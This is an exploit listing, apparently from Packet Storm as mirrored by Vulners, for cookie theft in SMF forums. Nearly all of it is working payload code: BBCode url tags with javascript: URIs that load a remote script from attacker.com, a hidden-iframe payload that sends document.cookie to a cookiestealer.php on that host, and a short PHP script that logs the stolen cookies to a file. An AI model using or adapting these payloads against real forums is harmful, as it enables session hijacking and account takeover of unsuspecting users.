Lucene search
K

SMF Cookie Stealing

🗓️ 03 Feb 2009 00:00:00Reported by Xianur0Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

SMF Cookie Stealing via BBCode and PH

Code
`Author: Xianur0  
  
BBCode of the smf not filtered properly specified urls:  
  
[center][size=14pt][url=javascript:alert('xss')]Saltando Filtro  
:D...[/url][/size]  
[url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://img508.imageshack.us/img508/6982/flmnetworkuserbar494abfyb2.png[/img][/center]  
  
Click on the image, run the javascript..  
  
BBC Cookie Exploit:  
  
[center][size=14pt][url=][/url][/size]  
[url=javascript:document.write('<iframe width="0%" height="0%"  
src="http://www.attacker.com/cookiestealer.php?cookie=' +  
document.cookie +'">  
frameborder="0%">');][img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]  
  
PHP Cookie Stealer:  
  
<?php  
$cookie = $_GET['cookie'];  
$handler = fopen('cookies.txt', 'a');  
fwrite($handler, $cookie."\n");  
?>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Feb 2009 00:00Current
0.4Low risk
Vulners AI Score0.4
21